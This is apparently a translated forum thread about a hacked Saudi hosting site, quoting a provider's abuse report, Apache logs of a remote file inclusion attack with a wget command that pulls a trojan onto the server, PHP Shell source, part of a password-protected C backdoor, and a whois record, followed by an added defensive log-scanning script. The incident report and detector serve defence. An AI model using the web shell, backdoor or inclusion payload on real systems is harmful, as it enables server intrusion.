The site http://www.saudi4host.net has been hacked
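Pleased with yourself, you hound?
Dirt on you and X Server
Do your worst
And say hello to the backup for me
Whenever you manage to hack it, give me a call on my mobile
To whom do I complain of my troubles ......... !!!!!!
I swear to God, this really weighs on the heart
And they call themselves Muslims, Arabs !!!!!!
There is no might and no power except with God, the Most High, the Almighty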
saudi4host
Remember God and calm your nerves
and don't let them provoke you
I understand you, by God, but we say praise be to God; God decreed it, and what He willed, He did
And praise be to God that you take care of backups
Don't worry, brother Fahd
I have backups:
daily
weekly
monthly
a backup held at the company on CD
or it has another name
ذاتبن
===================
As for root, by God, even if you die you won't get near it
And man, the C plus files you uploaded to the server, I'm not going to tell you
what to do with them
Fast Server discovered them, and this is the text of their message to me
============================
Greetings,
We recently received the following report of illicit activity on your
server (see message pasted below). Please immediately terminate the
offenders on your server, as our AUP clearly does not allow this sort of
activity.
We have logged into the server and chown'd and chmodd'd the specified
files (/home/music/public_html/cgi-bin).
-------------
Regards,
Technical Support Staff
PowerSurgeR Technologies, Inc. -- Technical Department
Phone: 800.867.5055 -- FAX: 319-236-6552
1025 Technology Parkway, Suite A
Cedar Falls, IA 50613
E-Mail: tech@powersurge.net
Web: http://www.powersurge.net/support/
BE198
-------------------------------------------------------------------------------------
This came into our ticket system.
The IP is one of yours when we look it up in billing.
Alex Broque
Hurricane Electric
Fremont, CA USA
---------- Forwarded message ----------
Date: Wed, 2 Apr 2003 12:49:12 -0800
From: support@he.net, John Cooper
To: broquea@he.net
Subject: [#119267] hacks
Here's the link on your server:
http://64.62.172.18/~music/cgi-bin/ovas0n.c
HOW THEY GOT IN : taken from apache logs
212.138.47.11 - - [02/Apr/2003:10:12:02 -0500] "GET /images/banners/wahl_banner.gif HTTP/1.0" 200 13834 "http://www.luckyscafe.com/index.php?file=http://tech4arab.com/shell" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
212.138.47.12 - - [02/Apr/2003:10:13:56 -0500] "GET /images/banners/gsi_banner.gif HTTP/1.0" 200 13018 "http://www.luckyscafe.com/index.php?file=http://tech4arab.com/shell?work_dir=/&command=wget+-P/tmp+http://64.62.172.18/~music/cgi-bin/ovas0n.c" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
THE SCRIPTS THEY USED AND THE TROJAN PLANT:
/*
**************************************************************
* PHP Shell *
**************************************************************
$Id: phpshell.php,v 1.13 2001/12/10 19:47:54 gimpster Exp $
An interactive PHP-page that will execute any command entered.
See the files README and INSTALL or http://www.gimpster.com for
further information.
Copyright (C) 2000 Martin Geisler
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You can get a copy of the GNU General Public License from this
address: http://www.gnu.org/copyleft/gpl.html#SEC1
You can also write to the Free Software Foundation, Inc., 59 Temple
Place - Suite 330, Boston, MA 02111-1307, USA.
*/
?>
PHP Shell
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
if ($regs[1][0] == '/') {
$new_dir = $regs[1];
} else {
$new_dir = $work_dir . '/' . $regs[1];
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
unset($command);
}
}
}
/* we chdir to that dir. */
if (file_exists($work_dir) && is_dir($work_dir)) {
chdir($work_dir);
$work_dir = exec("pwd");
} else {
/* No work_dir - we chdir to $DOCUMENT_ROOT */
chdir($DOCUMENT_ROOT);
$work_dir = $DOCUMENT_ROOT;
}
?>
" method="post">
Current working directory:
$work_dir_splitted = explode("/", substr($work_dir, 1));
echo "urlencode($command) . "\">Root/";
if ($work_dir_splitted[0] == "") {
$work_dir = "/"; /* Root directory. */
} else {
for ($i = 0; $i < count($work_dir_splitted); $i++) {
/* echo "i = $i";*/
$url .= "/".$work_dir_splitted[$i];
echo "urlencode($command) . "\">$work_dir_splitted[$i]/";
}
}
?>
Choose new working directory:
Command:
Enable stderr-trapping? name="stderr">
Output:
Copyright C 2000,
href="mailto:gimpster@gimpster.com">Martin Geisler. Get the latest
version at Arab VieruZ.
/* xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx */
/* P R I V A T E */
/********************************************************/
/* Opens a password protected backd00r and lets you */
/* execute commands, and then hides in the background */
/* I would like to thank SyF for gs.c */
/* coded by misteri0 //UnlG */
/********************************************************/
/* P R I V A T E */
/* xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx */
#include
#include
#include
#include
#include
#include
#include
#include
#define PASSAUTH 1 /* undefine this is you won't want a password at the beginning */
#define PORT 29369
#define MSG_WELCOME "unlg's backd00r, enter whatever is necessary\n All commands are followed by a ;\n"
#define MSG_PASSWORD "Password: "
#define MSG_WRONGPASS "Invalid password\n"
#define MSG_OK "Welcome...\n"
#define MSG_CONTINUE "Do you want to continue?\n"
#define HIDE "-bash"
#define SHELL "/bin/sh"
#ifdef PASSAUTH
#define PASSWD "app910h"
#endif
int main (int argc, char *argv[]);
#ifdef PASSAUTH
int login (int);
#endif
23703 (ovas0n)
--------------------------------------------------------------------------------
23704 (ovas0n) /tmp/ovas0n /home/luckys/public_html
-bash vas0n
WHOIS LOOKUP OF THE IP THE ATTACK CAME FROM:
% This is the RIPE Whois server.
% The objects are in RPSL format.
Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-serv...copyright.html
inetnum: 212.138.47.0 - 212.138.47.255
netname: ISU-5
descr: Internet Service Unit ISU
country: SA
admin-c: KR6046-RIPE
tech-c: KR6046-RIPE
status: ASSIGNED PA
mnt-by: KACST-ISU-MNT
mnt-lower: KACST-ISU-MNT
route: 212.138.0.0/16
role: KACST ROLE
address: Saudi Network Information Center, ISU
address: King Abdulaziz City for Science and Technology,
address: P.O.Box 6086, Riyadh 11442, Saudi Arabia.
phone: +9661 481 3932
fax-no: +9661 481 3254
e-mail: ipreg@saudinic.net.sa
trouble: abuse@isu.net.sa
admin-c: ZOM1-RIPE
tech-c: RA705-RIPE
tech-c: ANAS1-RIPE
nic-hdl: KR6046-RIPE
remarks: This Role object is for handling and maintaining all
remarks: IP Blocks registered by SaudiNIC(LIR) in Saudi Arabia.
mnt-by: KACST-ISU-MNT
changed: ipreg@saudinic.net.sa 20010701
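I edited the reply, and I hope we don't see insults and this kind of talk again, brother .. I appreciate your feelings and your position on what happened to your site, and may God help you, but that doesn't mean we should see insults like this .. my regards to you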
Net Hunter
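
Added example, not part of the original thread or of the hosting provider's report: in the log excerpt under "HOW THEY GOT IN", the include parameter shows up only in the Referer field of image requests, so a detector has to inspect the Referer as well as the request target. This Python script flags Apache combined-format entries where either field has a query parameter whose value is itself a remote URL; the sample lines, host names and addresses are constructed placeholders, and the function name scan is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "\S+ (?P<target>\S+)[^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines modelled on the report's excerpt; every host and
# address is a documentation placeholder, not a value from the report.
SAMPLE = [
    '192.0.2.11 - - [02/Apr/2003:10:12:02 -0500] "GET /images/a.gif HTTP/1.0" 200 13834 '
    '"http://shop.example/index.php?file=http://remote.example/shell" "Mozilla/4.0"',
    '192.0.2.12 - - [02/Apr/2003:10:13:56 -0500] "GET /images/b.gif HTTP/1.0" 200 13018 '
    '"http://shop.example/index.php?file=http://remote.example/shell?work_dir=/'
    '&command=wget+-P/tmp+http://198.51.100.7/x.c" "Mozilla/4.0"',
    '192.0.2.50 - - [02/Apr/2003:10:15:00 -0500] "GET /index.php?file=about.html HTTP/1.0" '
    '200 512 "-" "Mozilla/4.0"',
]


def scan(lines):
    """Flag entries whose request target or Referer has a URL-valued query parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line
        for field in ("target", "referer"):
            pairs = parse_qsl(urlsplit(m[field]).query, keep_blank_values=True)
            for name, value in pairs:
                if REMOTE_RE.match(value):
                    findings.append({
                        "ip": m["ip"], "time": m["time"], "field": field,
                        "param": name, "remote_host": urlsplit(value).hostname,
                        # Remaining parameters of the same URL, e.g. a command
                        # handed to the included script.
                        "other_params": {k: v for k, v in pairs if k != name},
                    })
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit in the Referer field is client-supplied evidence that a page was loaded with that parameter, so correlate it with the request for the including script itself in the same log.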